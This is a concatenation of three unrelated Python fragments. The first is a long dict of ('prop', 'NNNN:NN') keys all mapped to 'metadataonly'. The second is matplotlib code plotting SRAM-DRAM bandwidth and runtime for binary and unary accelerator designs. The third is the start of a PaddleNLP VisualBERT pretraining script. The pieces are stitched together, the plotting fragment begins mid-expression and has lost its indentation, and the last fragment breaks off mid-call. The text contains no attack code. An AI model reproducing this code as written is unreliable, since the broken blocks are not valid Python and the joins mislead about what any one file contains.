("prop", "1905:35"): "metadataonly",
("prop", "1905:36"): "metadataonly",
("prop", "1905:37"): "metadataonly",
("prop", "1905:38"): "metadataonly",
("prop", "1905:39"): "metadataonly",
("prop", "1905:4"): "metadataonly",
("prop", "1905:40"): "metadataonly",
("prop", "1905:42"): "metadataonly",
("prop", "1905:43"): "metadataonly",
("prop", "1905:44"): "metadataonly",
("prop", "1905:45"): "metadataonly",
("prop", "1905:46"): "metadataonly",
("prop", "1905:47"): "metadataonly",
("prop", "1905:48"): "metadataonly",
("prop", "1905:49"): "metadataonly",
("prop", "1905:5"): "metadataonly",
("prop", "1905:50"): "metadataonly",
("prop", "1905:51"): "metadataonly",
("prop", "1905:52"): "metadataonly",
("prop", "1905:53"): "metadataonly",
("prop", "1905:54"): "metadataonly",
("prop", "1905:55"): "metadataonly",
("prop", "1905:56"): "metadataonly",
("prop", "1905:57"): "metadataonly",
("prop", "1905:58"): "metadataonly",
("prop", "1905:59"): "metadataonly",
("prop", "1905:6"): "metadataonly",
("prop", "1905:60"): "metadataonly",
("prop", "1905:61"): "metadataonly",
("prop", "1905:62"): "metadataonly",
("prop", "1905:63"): "metadataonly",
("prop", "1905:64"): "metadataonly",
("prop", "1905:65"): "metadataonly",
("prop", "1905:66"): "metadataonly",
("prop", "1905:67"): "metadataonly",
("prop", "1905:68"): "metadataonly",
("prop", "1905:69"): "metadataonly",
("prop", "1905:7"): "metadataonly",
("prop", "1905:70"): "metadataonly",
("prop", "1905:71"): "metadataonly",
("prop", "1905:72"): "metadataonly",
("prop", "1905:73"): "metadataonly",
("prop", "1905:74"): "metadataonly",
("prop", "1905:75"): "metadataonly",
("prop", "1905:76"): "metadataonly",
("prop", "1905:77"): "metadataonly",
("prop", "1905:78"): "metadataonly",
("prop", "1905:79"): "metadataonly",
("prop", "1905:8"): "metadataonly",
("prop", "1905:80"): "metadataonly",
("prop", "1905:81"): "metadataonly",
("prop", "1905:82"): "metadataonly",
("prop", "1905:83"): "metadataonly",
("prop", "1905:84"): "metadataonly",
("prop", "1905:85"): "metadataonly",
("prop", "1905:86"): "metadataonly",
("prop", "1905:87"): "metadataonly",
("prop", "1905:88"): "metadataonly",
("prop", "1905:89"): "metadataonly",
("prop", "1905:9"): "metadataonly",
("prop", "1905:90"): "metadataonly",
("prop", "1905:91"): "metadataonly",
("prop", "1905:93"): "metadataonly",
("prop", "1905:94"): "metadataonly",
("prop", "1905:95"): "metadataonly",
("prop", "1905:96"): "metadataonly",
("prop", "1905:98"): "metadataonly",
("prop", "1905:99"): "metadataonly",
("prop", "1906:1"): "metadataonly",
("prop", "1906:10"): "metadataonly",
("prop", "1906:100"): "metadataonly",
("prop", "1906:101"): "metadataonly",
("prop", "1906:102"): "metadataonly",
("prop", "1906:103"): "metadataonly",
("prop", "1906:104"): "metadataonly",
("prop", "1906:105"): "metadataonly",
("prop", "1906:106"): "metadataonly",
("prop", "1906:107"): "metadataonly",
("prop", "1906:108"): "metadataonly",
("prop", "1906:109"): "metadataonly",
("prop", "1906:11"): "metadataonly",
("prop", "1906:110"): "metadataonly",
("prop", "1906:111"): "metadataonly",
("prop", "1906:112"): "metadataonly",
("prop", "1906:113"): "metadataonly",
("prop", "1906:114"): "metadataonly",
("prop", "1906:115"): "metadataonly",
("prop", "1906:116"): "metadataonly",
("prop", "1906:117"): "metadataonly",
("prop", "1906:118"): "metadataonly",
("prop", "1906:119"): "metadataonly",
("prop", "1906:12"): "metadataonly",
("prop", "1906:120"): "metadataonly",
("prop", "1906:121"): "metadataonly",
("prop", "1906:122"): "metadataonly",
("prop", "1906:123"): "metadataonly",
("prop", "1906:124"): "metadataonly",
("prop", "1906:125"): "metadataonly",
("prop", "1906:126"): "metadataonly",
("prop", "1906:127"): "metadataonly",
("prop", "1906:128"): "metadataonly",
("prop", "1906:129"): "metadataonly",
("prop", "1906:13"): "metadataonly",
("prop", "1906:130"): "metadataonly",
("prop", "1906:131"): "metadataonly",
("prop", "1906:132"): "metadataonly",
("prop", "1906:133"): "metadataonly",
("prop", "1906:134"): "metadataonly",
("prop", "1906:135"): "metadataonly",
("prop", "1906:136"): "metadataonly",
("prop", "1906:137"): "metadataonly",
("prop", "1906:138"): "metadataonly",
("prop", "1906:139"): "metadataonly",
("prop", "1906:14"): "metadataonly",
("prop", "1906:140"): "metadataonly",
("prop", "1906:141"): "metadataonly",
("prop", "1906:142"): "metadataonly",
("prop", "1906:143"): "metadataonly",
("prop", "1906:144"): "metadataonly",
("prop", "1906:145"): "metadataonly",
("prop", "1906:146"): "metadataonly",
("prop", "1906:147"): "metadataonly",
("prop", "1906:148"): "metadataonly",
("prop", "1906:150"): "metadataonly",
("prop", "1906:151"): "metadataonly",
("prop", "1906:152"): "metadataonly",
("prop", "1906:153"): "metadataonly",
("prop", "1906:154"): "metadataonly",
("prop", "1906:155"): "metadataonly",
("prop", "1906:157"): "metadataonly",
("prop", "1906:158"): "metadataonly",
("prop", "1906:159"): "metadataonly",
("prop", "1906:16"): "metadataonly",
("prop", "1906:160"): "metadataonly",
("prop", "1906:161"): "metadataonly",
("prop", "1906:162"): "metadataonly",
("prop", "1906:163"): "metadataonly",
("prop", "1906:17"): "metadataonly",
("prop", "1906:18"): "metadataonly",
("prop", "1906:19"): "metadataonly",
("prop", "1906:2"): "metadataonly",
("prop", "1906:20"): "metadataonly",
("prop", "1906:22"): "metadataonly",
("prop", "1906:23"): "metadataonly",
("prop", "1906:24"): "metadataonly",
("prop", "1906:25"): "metadataonly",
("prop", "1906:26"): "metadataonly",
("prop", "1906:27"): "metadataonly",
("prop", "1906:28"): "metadataonly",
("prop", "1906:29"): "metadataonly",
("prop", "1906:3"): "metadataonly",
("prop", "1906:30"): "metadataonly",
("prop", "1906:31"): "metadataonly",
("prop", "1906:32"): "metadataonly",
("prop", "1906:33"): "metadataonly",
("prop", "1906:34"): "metadataonly",
("prop", "1906:35"): "metadataonly",
("prop", "1906:36"): "metadataonly",
("prop", "1906:37"): "metadataonly",
("prop", "1906:38"): "metadataonly",
("prop", "1906:39"): "metadataonly",
("prop", "1906:4"): "metadataonly",
("prop", "1906:40"): "metadataonly",
("prop", "1906:41"): "metadataonly",
("prop", "1906:42"): "metadataonly",
("prop", "1906:43"): "metadataonly",
("prop", "1906:44"): "metadataonly",
("prop", "1906:45"): "metadataonly",
("prop", "1906:46"): "metadataonly",
("prop", "1906:47"): "metadataonly",
("prop", "1906:48"): "metadataonly",
("prop", "1906:5"): "metadataonly",
("prop", "1906:50"): "metadataonly",
("prop", "1906:51"): "metadataonly",
("prop", "1906:52"): "metadataonly",
("prop", "1906:53"): "metadataonly",
("prop", "1906:56"): "metadataonly",
("prop", "1906:57"): "metadataonly",
("prop", "1906:58"): "metadataonly",
("prop", "1906:59"): "metadataonly",
("prop", "1906:6"): "metadataonly",
("prop", "1906:60"): "metadataonly",
("prop", "1906:61"): "metadataonly",
("prop", "1906:62"): "metadataonly",
("prop", "1906:63"): "metadataonly",
("prop", "1906:64"): "metadataonly",
("prop", "1906:65"): "metadataonly",
("prop", "1906:66"): "metadataonly",
("prop", "1906:67"): "metadataonly",
("prop", "1906:68"): "metadataonly",
("prop", "1906:69"): "metadataonly",
("prop", "1906:7"): "metadataonly",
("prop", "1906:70"): "metadataonly",
("prop", "1906:71"): "metadataonly",
("prop", "1906:72"): "metadataonly",
("prop", "1906:73"): "metadataonly",
("prop", "1906:74"): "metadataonly",
("prop", "1906:75"): "metadataonly",
("prop", "1906:76"): "metadataonly",
("prop", "1906:77"): "metadataonly",
("prop", "1906:78"): "metadataonly",
("prop", "1906:79"): "metadataonly",
("prop", "1906:8"): "metadataonly",
("prop", "1906:80"): "metadataonly",
("prop", "1906:81"): "metadataonly",
("prop", "1906:82"): "metadataonly",
("prop", "1906:83"): "metadataonly",
("prop", "1906:85"): "metadataonly",
("prop", "1906:86"): "metadataonly",
("prop", "1906:87"): "metadataonly",
("prop", "1906:88"): "metadataonly",
("prop", "1906:89"): "metadataonly",
("prop", "1906:9"): "metadataonly",
("prop", "1906:90"): "metadataonly",
("prop", "1906:91"): "metadataonly",
("prop", "1906:92"): "metadataonly",
("prop", "1906:93"): "metadataonly",
("prop", "1906:94"): "metadataonly",
("prop", "1906:95"): "metadataonly",
("prop", "1906:96"): "metadataonly",
("prop", "1906:97"): "metadataonly",
("prop", "1906:98"): "metadataonly",
("prop", "1906:99"): "metadataonly",
("prop", "1907:1"): "metadataonly",
("prop", "1907:100"): "metadataonly",
("prop", "1907:101"): "metadataonly",
("prop", "1907:102"): "metadataonly",
("prop", "1907:103"): "metadataonly",
("prop", "1907:104"): "metadataonly",
("prop", "1907:105"): "metadataonly",
("prop", "1907:106"): "metadataonly",
("prop", "1907:107"): "metadataonly",
("prop", "1907:108"): "metadataonly",
("prop", "1907:109"): "metadataonly",
("prop", "1907:11"): "metadataonly",
("prop", "1907:110"): "metadataonly",
("prop", "1907:111"): "metadataonly",
("prop", "1907:112"): "metadataonly",
("prop", "1907:113"): "metadataonly",
("prop", "1907:114"): "metadataonly",
("prop", "1907:115"): "metadataonly",
("prop", "1907:116"): "metadataonly",
("prop", "1907:117"): "metadataonly",
("prop", "1907:118"): "metadataonly",
("prop", "1907:119"): "metadataonly",
("prop", "1907:12"): "metadataonly",
("prop", "1907:120"): "metadataonly",
("prop", "1907:121"): "metadataonly",
("prop", "1907:122"): "metadataonly",
("prop", "1907:123"): "metadataonly",
("prop", "1907:124"): "metadataonly",
("prop", "1907:125"): "metadataonly",
("prop", "1907:126"): "metadataonly",
("prop", "1907:127"): "metadataonly",
("prop", "1907:128"): "metadataonly",
("prop", "1907:129"): "metadataonly",
("prop", "1907:13"): "metadataonly",
("prop", "1907:130"): "metadataonly",
("prop", "1907:131"): "metadataonly",
("prop", "1907:132"): "metadataonly",
("prop", "1907:133"): "metadataonly",
("prop", "1907:134"): "metadataonly",
("prop", "1907:135"): "metadataonly",
("prop", "1907:136"): "metadataonly",
("prop", "1907:137"): "metadataonly",
("prop", "1907:138"): "metadataonly",
("prop", "1907:139"): "metadataonly",
("prop", "1907:14"): "metadataonly",
("prop", "1907:140"): "metadataonly",
("prop", "1907:141"): "metadataonly",
("prop", "1907:142"): "metadataonly",
("prop", "1907:143"): "metadataonly",
("prop", "1907:144"): "metadataonly",
("prop", "1907:145"): "metadataonly",
("prop", "1907:146"): "metadataonly",
("prop", "1907:147"): "metadataonly",
("prop", "1907:148"): "metadataonly",
("prop", "1907:149"): "metadataonly",
("prop", "1907:15"): "metadataonly",
("prop", "1907:150"): "metadataonly",
("prop", "1907:151"): "metadataonly",
("prop", "1907:152"): "metadataonly",
("prop", "1907:153"): "metadataonly",
("prop", "1907:154"): "metadataonly",
("prop", "1907:155"): "metadataonly",
("prop", "1907:157"): "metadataonly",
("prop", "1907:158"): "metadataonly",
("prop", "1907:159"): "metadataonly",
("prop", "1907:16"): "metadataonly",
("prop", "1907:160"): "metadataonly",
("prop", "1907:161"): "metadataonly",
("prop", "1907:162"): "metadataonly",
("prop", "1907:163"): "metadataonly",
("prop", "1907:164"): "metadataonly",
("prop", "1907:165"): "metadataonly",
("prop", "1907:166"): "metadataonly",
("prop", "1907:167"): "metadataonly",
("prop", "1907:168"): "metadataonly",
("prop", "1907:169"): "metadataonly",
("prop", "1907:17"): "metadataonly",
("prop", "1907:170"): "metadataonly",
("prop", "1907:171"): "metadataonly",
("prop", "1907:172"): "metadataonly",
("prop", "1907:173"): "metadataonly",
("prop", "1907:174"): "metadataonly",
("prop", "1907:175"): "metadataonly",
("prop", "1907:176"): "metadataonly",
("prop", "1907:177"): "metadataonly",
("prop", "1907:178"): "metadataonly",
("prop", "1907:179"): "metadataonly",
("prop", "1907:180"): "metadataonly",
("prop", "1907:181"): "metadataonly",
("prop", "1907:182"): "metadataonly",
("prop", "1907:183"): "metadataonly",
("prop", "1907:184"): "metadataonly",
("prop", "1907:185"): "metadataonly",
("prop", "1907:186"): "metadataonly",
("prop", "1907:187"): "metadataonly",
("prop", "1907:188"): "metadataonly",
("prop", "1907:189"): "metadataonly",
("prop", "1907:19"): "metadataonly",
("prop", "1907:190"): "metadataonly",
("prop", "1907:191"): "metadataonly",
("prop", "1907:192"): "metadataonly",
("prop", "1907:193"): "metadataonly",
("prop", "1907:194"): "metadataonly",
("prop", "1907:195"): "metadataonly",
("prop", "1907:196"): "metadataonly",
("prop", "1907:197"): "metadataonly",
("prop", "1907:198"): "metadataonly",
("prop", "1907:199"): "metadataonly",
("prop", "1907:2"): "metadataonly",
("prop", "1907:20"): "metadataonly",
("prop", "1907:200"): "metadataonly",
("prop", "1907:21"): "metadataonly",
("prop", "1907:23"): "metadataonly",
("prop", "1907:24"): "metadataonly",
("prop", "1907:25"): "metadataonly",
("prop", "1907:27"): "metadataonly",
("prop", "1907:3"): "metadataonly",
("prop", "1907:31"): "metadataonly",
("prop", "1907:32"): "metadataonly",
("prop", "1907:33"): "metadataonly",
("prop", "1907:34"): "metadataonly",
("prop", "1907:35"): "metadataonly",
("prop", "1907:36"): "metadataonly",
("prop", "1907:37"): "metadataonly",
("prop", "1907:38"): "metadataonly",
("prop", "1907:39"): "metadataonly",
("prop", "1907:4"): "metadataonly",
("prop", "1907:40"): "metadataonly",
("prop", "1907:41"): "metadataonly",
("prop", "1907:42"): "metadataonly",
("prop", "1907:43"): "metadataonly",
("prop", "1907:44"): "metadataonly",
("prop", "1907:45"): "metadataonly",
("prop", "1907:46"): "metadataonly",
("prop", "1907:47"): "metadataonly",
("prop", "1907:48"): "metadataonly",
("prop", "1907:49"): "metadataonly",
("prop", "1907:5"): "metadataonly",
("prop", "1907:50"): "metadataonly",
("prop", "1907:51"): "metadataonly",
("prop", "1907:52"): "metadataonly",
("prop", "1907:53"): "metadataonly",
("prop", "1907:54"): "metadataonly",
("prop", "1907:55"): "metadataonly",
("prop", "1907:56"): "metadataonly",
("prop", "1907:57"): "metadataonly",
("prop", "1907:58"): "metadataonly",
("prop", "1907:59"): "metadataonly",
("prop", "1907:6"): "metadataonly",
("prop", "1907:60"): "metadataonly",
("prop", "1907:61"): "metadataonly",
("prop", "1907:62"): "metadataonly",
("prop", "1907:63"): "metadataonly",
("prop", "1907:64"): "metadataonly",
("prop", "1907:65"): "metadataonly",
("prop", "1907:66"): "metadataonly",
("prop", "1907:67"): "metadataonly",
("prop", "1907:68"): "metadataonly",
("prop", "1907:69"): "metadataonly",
("prop", "1907:7"): "metadataonly",
("prop", "1907:71"): "metadataonly",
("prop", "1907:72"): "metadataonly",
("prop", "1907:73"): "metadataonly",
("prop", "1907:74"): "metadataonly",
("prop", "1907:75"): "metadataonly",
("prop", "1907:76"): "metadataonly",
("prop", "1907:77"): "metadataonly",
("prop", "1907:78"): "metadataonly",
("prop", "1907:79"): "metadataonly",
("prop", "1907:8"): "metadataonly",
("prop", "1907:80"): "metadataonly",
("prop", "1907:81"): "metadataonly",
("prop", "1907:82"): "metadataonly",
("prop", "1907:83"): "metadataonly",
("prop", "1907:84"): "metadataonly",
("prop", "1907:85"): "metadataonly",
("prop", "1907:86"): "metadataonly",
("prop", "1907:87"): "metadataonly",
("prop", "1907:88"): "metadataonly",
("prop", "1907:89"): "metadataonly",
("prop", "1907:90"): "metadataonly",
("prop", "1907:91"): "metadataonly",
("prop", "1907:92"): "metadataonly",
("prop", "1907:93"): "metadataonly",
("prop", "1907:94"): "metadataonly",
("prop", "1907:95"): "metadataonly",
("prop", "1907:96"): "metadataonly",
("prop", "1907:97"): "metadataonly",
| |
+ name + "_energy.csv", index=31)) # sa D
energy_list.append(return_indexed_elems(input_csv=path + name + "_energy.csv", index=32)) # sa L
# bandwidth
my_dpi = 300
if a == "eyeriss":
fig_h = 1.6
else:
fig_h = 1.3
fig_w = 3.3115
bp_color = "#7A81FF"
bs_color = "#FF7F7F"
u6_color = "#666666"
u7_color = "#888888"
u8_color = "#AAAAAA"
ug_color = "#CCCCCC"
bg_color = "#D783FF"
x_axis = ["Average"]
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
idx_tot = 6
x_idx = np.arange(len(x_axis))
width = 1 / 2**(math.ceil(math.log2(idx_tot)))
iterval = width
# 8b - spm - bp
index = 0
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx = 1.5
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=bp_color, label="Binary Parallel")
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=bp_color)
dram_bw_list_bp_spm = [i for i in dram_bw_list]
sram_bw_list_bp_spm = [i for i in sram_bw_list]
# 8b - spm - bs
index = 1
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=bs_color, label="Binary Serial")
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=bs_color)
dram_bw_list_bs_spm = [i for i in dram_bw_list]
sram_bw_list_bs_spm = [i for i in sram_bw_list]
# 8b - wospm - ur - 32c
index = 2
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u6_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u6_color)
dram_bw_list_u6_wspm = [i for i in dram_bw_list]
sram_bw_list_u6_wspm = [i for i in sram_bw_list]
# 8b - wospm - ur - 64c
index = 3
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u7_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u7_color)
dram_bw_list_u7_wspm = [i for i in dram_bw_list]
sram_bw_list_u7_wspm = [i for i in sram_bw_list]
# 8b - wospm - ur - 128c
index = 4
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u8_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u8_color)
dram_bw_list_u8_wspm = [i for i in dram_bw_list]
sram_bw_list_u8_wspm = [i for i in sram_bw_list]
# 8b - wospm - ug - 256c
index = 5
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=ug_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=ug_color)
dram_bw_list_ug_wspm = [i for i in dram_bw_list]
sram_bw_list_ug_wspm = [i for i in sram_bw_list]
ax.set_ylabel('SRAM-DRAM bandwidth\n(GB/s)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("symlog", linthresh=0.001)
# locs, labels = plt.yticks()
if a == "eyeriss":
locs = [-10, -1, -0.1, -0.01, -0.001, 0, 0.001, 0.01, 0.1, 1, 10]
else:
locs = [-10, -1, -0.1, -0.01, -0.001, 0, 0.001, 0.01, 0.1, 1, 10]
ax.set_yticks(locs)
y_label_list = []
for y in locs:
if y != 0:
y_label_list.append("{:1.0E}".format(abs(y)))
else:
y_label_list.append("0")
ax.set_yticklabels(y_label_list)
bottom, top = plt.ylim()
if a == "eyeriss":
ax.set_ylim((bottom, top*2500))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top/2500], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.legend(loc="upper center", ncol=3, frameon=True)
else:
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.axhline(y=0, color="k", linewidth = 0.1)
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Bandwidth_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
if print_bandwidth:
print("DRAM bp spm :", dram_bw_list_bp_spm)
print("min:", min(dram_bw_list_bp_spm), "max:", max(dram_bw_list_bp_spm))
print("DRAM bs spm :", dram_bw_list_bs_spm)
print("min:", min(dram_bw_list_bs_spm), "max:", max(dram_bw_list_bs_spm))
print("SRAM bp spm :", sram_bw_list_bp_spm)
print("SRAM bs spm :", sram_bw_list_bs_spm)
print("DRAM u6 wspm:", dram_bw_list_u6_wspm)
print("min:", min(dram_bw_list_u6_wspm), "max:", max(dram_bw_list_u6_wspm))
print("DRAM u7 wspm:", dram_bw_list_u7_wspm)
print("min:", min(dram_bw_list_u7_wspm), "max:", max(dram_bw_list_u7_wspm))
print("DRAM u8 wspm:", dram_bw_list_u8_wspm)
print("min:", min(dram_bw_list_u8_wspm), "max:", max(dram_bw_list_u8_wspm))
print("DRAM ug wspm:", dram_bw_list_ug_wspm)
print("min:", min(dram_bw_list_ug_wspm), "max:", max(dram_bw_list_ug_wspm))
sram_bw_r_list_bp_spm = []
sram_bw_r_list_bs_spm = []
for i in range(len(dram_bw_list_bp_spm)):
sram_bw_r_list_bp_spm.append(-sram_bw_list_bp_spm[i] / dram_bw_list_bp_spm[i])
sram_bw_r_list_bs_spm.append(-sram_bw_list_bs_spm[i] / dram_bw_list_bs_spm[i])
print("SRAM bp wspm r:", sram_bw_r_list_bp_spm)
print("SRAM bs wspm r:", sram_bw_r_list_bs_spm)
print("Bandwidth fig saved!\n")
# runtime
my_dpi = 300
if a == "eyeriss":
fig_h = 1.1
else:
fig_h = 1
fig_w = 3.3115
bp_color = "#7A81FF"
bs_color = "#FF7F7F"
u6_color = "#666666"
u7_color = "#888888"
u8_color = "#AAAAAA"
ug_color = "#CCCCCC"
bg_color = "#D783FF"
x_axis = ["Average"]
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
idx_tot = 6
x_idx = np.arange(len(x_axis))
width = 1 / 2**(math.ceil(math.log2(idx_tot)))
iterval = width
# 8b - spm - bp
index = 0
runtime_list = time_list[index][-1:]
idx = 1.5
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=bp_color, label="Binary Parallel")
runtime_ideal_r_list_bp_spm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_bp_spm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - spm - bs
index = 1
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=bs_color, label="Binary Serial")
runtime_ideal_r_list_bs_spm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_bs_spm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 32c
index = 2
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u6_color, label="Unary-32c")
runtime_ideal_r_list_u6_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u6_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 64c
index = 3
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u7_color, label="Unary-64c")
runtime_ideal_r_list_u7_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u7_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 128c
index = 4
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u8_color, label="Unary-128c")
runtime_ideal_r_list_u8_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u8_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ug - 256c
index = 5
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=ug_color, label="uGEMM-H")
runtime_ideal_r_list_ug_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_ug_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
ax.set_ylabel('Runtime\n(Seconds)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("log")
_, top = plt.ylim()
locs, labels = plt.yticks()
if a == "eyeriss":
locs = locs[1:-1]
else:
locs = locs[1:]
ax.set_yticks(locs)
bottom, _ = plt.ylim()
if a == "eyeriss":
ax.set_ylim((bottom, top*80))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top/80], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.legend(loc="upper center", ncol=3, frameon=True)
else:
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
y_label_list = []
for y in locs:
if y != 0:
y_label_list.append("{:1.0E}".format(abs(y)))
else:
y_label_list.append("0")
ax.set_yticklabels(y_label_list)
ax.minorticks_off()
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Runtime_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
if print_runtime:
print("BP SPM overhead: ", runtime_ideal_r_list_bp_spm)
print("CONV mean: ", mean(runtime_ideal_r_list_bp_spm[0:5])*100, "%")
print("BR SPM overhead: ", runtime_ideal_r_list_bs_spm)
print("CONV mean: ", mean(runtime_ideal_r_list_bs_spm[0:5])*100, "%")
print("U6 WSPM overhead: ", runtime_ideal_r_list_u6_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u6_wspm[0:5])*100, "%")
print("U7 WSPM overhead: ", runtime_ideal_r_list_u7_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u7_wspm[0:5])*100, "%")
print("U8 WSPM overhead: ", runtime_ideal_r_list_u8_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u8_wspm[0:5])*100, "%")
print("UG WSPM overhead: ", runtime_ideal_r_list_ug_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_ug_wspm[0:5])*100, "%")
print("Runtime fig saved!\n")
# throughput
my_dpi = 300
if a == "eyeriss":
fig_h = 1.1
else:
fig_h = 1
fig_w = 3.3115
bp_color | |
import argparse
import copy
import json
import logging
import os
import os.path as osp
import random
import time
from collections import OrderedDict
from functools import partial
import numpy as np
import paddle
from paddlenlp.data import Dict, Pad
from paddlenlp.datasets.dataset import load_dataset
from paddlenlp.transformers import (BertTokenizer, VisualBertModel,
LinearDecayWithWarmup,
VisualBertForPreTraining)
# Logging format/level used by the whole pretraining script.
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)

# Maps --model_type to (base model class, pretraining head class, tokenizer class).
MODEL_CLASSES = {
    "visualbert": (VisualBertModel, VisualBertForPreTraining, BertTokenizer),
}
def _str2bool(value):
    """Parse a boolean command-line value.

    `type=bool` is an argparse pitfall: every non-empty string (including
    "False") is truthy, so `--eager_run False` would silently yield True.
    """
    if isinstance(value, bool):
        return value
    if value.lower() in ("yes", "true", "t", "y", "1"):
        return True
    if value.lower() in ("no", "false", "f", "n", "0"):
        return False
    raise argparse.ArgumentTypeError(
        "Boolean value expected, got %r" % value)


def parse_args():
    """Build and parse the command-line arguments for VisualBERT pretraining.

    Returns:
        argparse.Namespace with all training hyper-parameters and paths.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--model_type",
        default="visualbert",
        type=str,
        help="Model type selected in the list: " +
        ", ".join(MODEL_CLASSES.keys()), )
    parser.add_argument(
        "--bert_model_name",
        default="bert-base-uncased",
        type=str,
        help="Path to bert model or shortcut name selected in the list: " +
        ", ".join(
            sum([
                list(classes[-1].pretrained_init_configuration.keys())
                for classes in MODEL_CLASSES.values()
            ], [])), )
    parser.add_argument(
        "--model_name_or_path",
        default="visualbert-vqa-coco-pre",
        type=str,
        help="Path to pre-trained model or shortcut name selected in the list: "
        + ", ".join(
            sum([
                list(classes[0].pretrained_init_configuration.keys())
                for classes in MODEL_CLASSES.values()
            ], [])), )
    parser.add_argument(
        "--input_dir",
        default=None,
        type=str,
        required=True,
        help="The input directory where the data will be read from.", )
    parser.add_argument(
        "--output_dir",
        default=None,
        type=str,
        required=True,
        help="The output directory where the model predictions and checkpoints will be written.",
    )
    parser.add_argument(
        "--image_feature_type",
        default="coco_detectron_fix_100",
        type=str,
        help="`coco_detectron_fix_100` for vqa-coco-pre; `coco_detectron_fix_144` for nlvr2-coco-pre; `coco_detectron_fix_100` for vqa-pre; `nlvr2_detectron_fix_144` for nlvr2-pre; "
    )
    parser.add_argument(
        "--dataset",
        default="coco_captions",
        type=str,
        help="coco_captions for coco pretrain")
    parser.add_argument(
